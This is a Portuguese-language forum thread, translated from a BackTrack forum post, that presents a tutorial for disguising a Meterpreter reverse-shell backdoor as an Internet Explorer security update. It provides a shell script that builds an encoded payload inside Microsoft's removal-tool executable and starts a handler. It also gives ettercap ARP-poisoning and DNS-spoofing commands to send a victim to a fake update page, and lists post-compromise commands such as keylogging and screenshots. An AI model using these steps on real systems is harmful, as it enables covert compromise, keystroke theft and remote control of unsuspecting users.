Results 1 to 2 of 2

Thread: "Encobrindo" um backdoor do meterpreter em um Patch do IE

Threaded View

  1. #1
    Moderator firebits's Avatar
    Join Date
    Mar 2010
    Location
    Brazil
    Posts
    353

    Lightbulb "Encobrindo" um backdoor do meterpreter em um Patch do IE

    Oi pessoal,

    Aqui está um tutorial sobre como criar um backdoor no Meterpreter indetectável e encobri-lo como uma atualização de segurança do Internet Explorer. Eu criei um script bem básico que cria o backdoor no Meterpreter e inicia o multi/handler.

    Vou injetar o payload no Microsoft Windows Malicious Software Removal Tool, que está disponível para download aqui.

    Download details: Microsoft® Windows® Malicious Software Removal Tool (KB890830)

    E eu vou usar o ettercap para fazer dns_spoof na vítima usando uma página falsa do Internet Explorer que seria equivalente à atualização de segurança.

    Salve meu script como myscript.sh:

    Code:
    #!/bin/sh
    clear
    cd /pentest/exploits/framework3
    echo "*************************************"
    echo "              creating a meterpreter backdoor          "
    echo "*************************************"
    echo -n "lhost ?"
    read lhost
    echo -n "lport?"
    read lport 
    echo -n "path to output file?"
    read filename
    echo -n "path to input file?"
    read originalfile
    echo "creating payload ..."
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport R | ./msfencode -e x86/shikata_ga_nai -c 10 -t exe -x $originalfile -o $filename
    echo "payload created !"
    echo "starting multi/handler ..."
    ./msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport E
    Faça o meu script ser executável:

    Code:
    chmod 755 myscript.sh
    Execute o meu script:

    Code:
    ./myscript.sh lhost => your ip lport => 5555 output => /root/backdoor.exe input => /root/windows-kb890830-v3.12
    Set up portforwarding no sysctrl do seu kernel (se for em outra localização do seu kernel, procure na internet algo sobre kernel e versão no Ubuntu)

    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    Set up etter.dns localizado em /usr/share/ettercap

    Code:
    nano /usr/share/ettercap/etter.dns
    Remova a parte onde microsoft esta forwarded para o linux e adicione as seguintes linhas:
    Code:
    * A Seu Ip
    *.* A Seu Ip *.*.* A Seu Ip *.*.*.* A Seu Ip
    Crie um site onde você pode baixar o arquivo ou baixar minha web.

    http://home.base.be/%72%68%69%6E%63%...ous_update.rar

    Eu usei o Photoshop para editar algumas fotos que eu encontrei a respeito do Internet Explorer,
    Criei uma página simples em html, adicionei uma folha de estilo - CSS para posicionar o botão de download e para fazer a página parecer o mesmo com todas as resolução da tela.

    Copie todos os arquivos para o diretório de publicação padrão do Apache /var/www/

    Restart o Apache:

    Code:
     /etc/init.d/apache2 restart
    Ative o DNS spoofing:

    Code:
    ettercap -T -q -i eth0 -P dns_spoof -M arp:remote /ip da vitima/ /gateway ip/
    Gateway IP pode ser encontrado digitando isso no terminal:

    Code:
    route -n
    Agora só temos que esperar a nossa vítima para executar o backdoor. Quando a vítima executar o backdoor, você deve ver algo como "session 1 opened". Você pode ver suas sessões ativas, digitando:

    Code:
    sessions -r
    OBS: Isso se deve devido o backdoor ter sido criado no Metasploit/Meterpreter, então é o comando acima que visualiza as sessões do mesmo, bem como quase todos os comandos na sequência abaixo. Para saber mais sobre Metasploit/Meterpreter busque no nosso forum, fale com firebits, espreto, spwam, bhio e outros membros, mas seja "claro e objetivo" nas suas perguntas e post sempre no nosso forum.



    Você pode saltar para a primeira sessão, digitando:

    Code:
    sessions -i 1
    Há uma série de comandos que são capazes de executar. Você pode vê-los todos, escrevendo:
    Code:
    help
    Alguns exemplos:

    Code:
    sysinfo => get system info
    shell => jump into a cmd shell
    keyscan_start => scan for keyboard input
    keyscan_dump => dump keyboard input
    keyscan_stop => stop scanning
    screenshot => take screenshot
    upload
    download
    Fonte: http://www.backtrack-linux.org/forum...-backdoor.html
    Traduzido e Adaptado por @firebitsbr
    Last edited by firebits; 11-28-2010 at 01:09 PM.

Similar Threads

  1. Replies: 4
    Last Post: 02-24-2011, 04:52 PM
  2. Replies: 1
    Last Post: 11-18-2010, 08:46 AM
  3. Replies: 9
    Last Post: 06-26-2010, 07:03 PM
  4. "Friendly" Worm to patch software
    By KMDave in forum OLD General IT Discussion
    Replies: 8
    Last Post: 02-17-2008, 01:52 AM
  5. Replies: 17
    Last Post: 10-04-2007, 03:54 AM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •